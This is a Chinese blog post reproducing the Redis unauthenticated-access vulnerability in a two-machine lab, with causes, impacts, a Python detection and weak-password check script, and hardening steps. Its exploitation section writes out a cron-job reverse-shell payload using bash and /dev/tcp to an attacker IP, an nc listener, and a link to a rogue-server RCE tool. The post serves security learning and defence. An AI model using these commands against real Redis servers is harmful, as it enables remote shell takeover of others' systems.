Redis未授权访问漏洞复现

最新推荐文章于 2024-01-19 23:01:47 发布
最新推荐文章于 2024-01-19 23:01:47 发布
阅读量483 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_38844729/article/details/106250601
版权

漏洞分析

漏洞产生:

  1. redis绑定在 0.0.0.0:6379,直接暴露在公网
  2. 默认为空密码,可以免密码远程登录redis服务

漏洞危害:

  1. 攻击者无需认证访问到内部数据,导致敏感信息泄露
  2. 攻击者通过数据备份功能往磁盘写入后门文件
  3. 如果redis以root身份运行,攻击者可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器

漏洞复现

环境:ubuntu系统两台,分别做为服务端和客户端
redis安装:

wget http://download.redis.io/releases/redis-2.8.17.tar.gz 下载安装包
tar xzvf redis-2.8.17.tar.gz		解压
cd redis-2.8.17						进入redis目录		
make								编译安装
cd src								进入src目录
cp redis-server /usr/bin			复制服务端
cp redis-cli /usr/bin				复制客户端
cp redis-2.8.17/redis.conf /etc/	复制conf配置文件

启动redis服务:redis-server /etc/redis.conf
在这里插入图片描述
漏洞测试:
1、客户端无账号直接登录redis
在这里插入图片描述
2、crontab-计划任务反弹shell
攻击机开启监听:nc -lvp 7777
连接redis执行命令:

redis-cli -h 10.18.100.38
config get dir			先查看备份目录,待会要修改回来,否则redis可能会出现异常
config get dbfilename 	先查看备份文件名

set  xx   "\n* * * * * bash -i >& /dev/tcp/攻击机IP/7777 0>&1\n"
config set dir /var/spool/cron	修改备份目录
config set dbfilename root		修改备份文件名
save
等待反弹shell,之后要改回原来的路径和文件名

config set dir xxxx
config set dbfilename dump.rdb
save

3、主从复制RCE
利用脚本:https://github.com/n0b0dyCN/redis-rogue-server

检测脚本

# _*_  coding:utf-8 _*_
import socket
import sys
PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
def check(ip, port, timeout):
    try:
        socket.setdefaulttimeout(timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, int(port)))
        s.send("INFO\r\n")
        result = s.recv(1024)
        if "redis_version" in result:
            return u"未授权访问"
        elif "Authentication" in result:
            for pass_ in PASSWORD_DIC:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("AUTH %s\r\n" %(pass_))
                result = s.recv(1024)
                if '+OK' in result:
                    return u"存在弱口令,密码:%s" % (pass_)
    except Exception, e:
        pass
if __name__ == '__main__':
    ip=sys.argv[1]
    port=sys.argv[2]
    print check(ip,port, timeout=10)

漏洞修复

1、限制IP访问
在redis.conf文件中找到# bind 127.0.0.1
在这里插入图片描述
去掉#bind 127.0.0.1前面的注释#,将127.0.0.1改成可以访问的IP地址
2、添加密码认证
redis.conf文件中找到requirepass,然后修改如下:

requirepass yourpassword
yourpassword就是redis验证密码,设置密码以后可以登陆,但是无法执行命令

客户端登录之后需要进行认证才能访问auth yourpassword
在这里插入图片描述

参考文章

https://www.cnblogs.com/bmjoker/p/9548962.html

Franchi小白帽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis授权漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-29 1286
简介 Redis 默认情况下,会绑定在本地6379端口,如果没有进行相关策略,会将 Redis 服务暴露到公网上,在没有设置密码认证(默认为空)的情况下,任意用户在可以访问目标服务器的情况下授权访问Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,可以将ssh公钥写入目标服务器的 /root/.ssh/authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录...
Redis授权访问漏洞搭建复现
m0_58595840的博客
01-05 2779
Redis授权访问漏洞利用方式总结(含靶场搭建)
redis授权访问漏洞复现
最新发布
qq_46343633的博客
01-19 2054
Redis 全称 Remote DictionaryServer(即远程字典服务),它是一个基于内存(当然也可以把其存储至硬盘上,这也是写shell的必要条件之一)实现的键值型非关系(NoSQL)数据库。Redis 免费开源,其最新稳定版本是 6.2.x(2022/11/10)。常用版本包括3.0、4.0、5.0。自 Redis 诞生以来,它以其超高的性能、完美的文档和简洁易懂的源码广受好评,国内外很多大型互联网公司都在使用 Redis,比如腾讯、阿里、Twitter、Github 等等。
漏洞复现Redis授权访问
m0_56190544的博客
09-13 2369
本文详细介绍了redis授权访问漏洞的原理以及利用方法,供大家参考学习
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
Redis授权访问漏洞复现与利用
Forget_liu的博客
06-07 2448
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
漏洞复现 - - - 授权访问漏洞Redis
weixin_67503304的博客
08-13 4704
授权访问漏洞Redis, 通过redis数据备份功能,往WEB网站根目录写入一句话木马,利用shell得到WEB网站权限,通过定时任务反弹Shell,写SSH公钥,实现免密登录linux服务器
Redis授权访问及利用复现(保姆级教程)
qq_34341458的博客
08-19 595
文章目录一、简介:二、漏洞影响版本三、漏洞危害四、漏洞环境搭建1. 靶机安装Redis2. kali安装Redis客户端(Redis-cli)五、漏洞复现利用方式11:写入webshell2. 写入一句话利用方式2:通过写入SSH公钥实现SSH登录利用方式3:在crontab里写定时任务,反弹shell参考: 一、简介: Redis 是一个高效的数据库,默认会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公
Redis授权访问漏洞
weixin_34149796的博客
09-28 140
  一、漏洞描述和危害  Redis因配置不当可以授权访问,被攻击者恶意利用。  攻击者无需认证访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据。  攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。    二、已确认被成功利用的...
Redis授权访问漏洞复现及利用
Lilin's博客
03-20 656
Redis授权访问漏洞复现及利用Redis相关介绍应用场景常用语法漏洞复现环境搭建Centos 7 环境配置安装Apache安装PHP安装Redis漏洞利用准备kali安装Rediswindows安装Redis授权访问漏洞利用webshell反弹shell写公钥主从复制RCE预防措施其他问题 Redis相关介绍 Redis是完全开源的,遵守BSD协议,是一个高性能的key-value数据库。 应用场景 在Java web中主要有两个应用场景: 存储、缓存用的数据 需要高速读写的场合使用它快速读写 常
redis授权访问漏洞复现
weixin_44253823的博客
07-28 265
漏洞介绍 Redis是一个数据库,默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,如果Redis以Root权限运行,攻击者可以成功将自己的
redis授权访问漏洞复现学习
0nc3的博客
12-14 447
0x00 前言 前段时间看到想复现学习一下,然后就忘了 越临近考试越不想复习 链接:https://xz.aliyun.com/t/6103#toc-53 0x01 常见的授权访问漏洞 Redis 授权访问漏洞 MongoDB 授权访问漏洞 Jenkins 授权访问漏洞 Memcached 授权访问漏洞 JBOSS授权访问漏洞 VNC 授权访问漏洞 Docker 授权访问漏洞 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值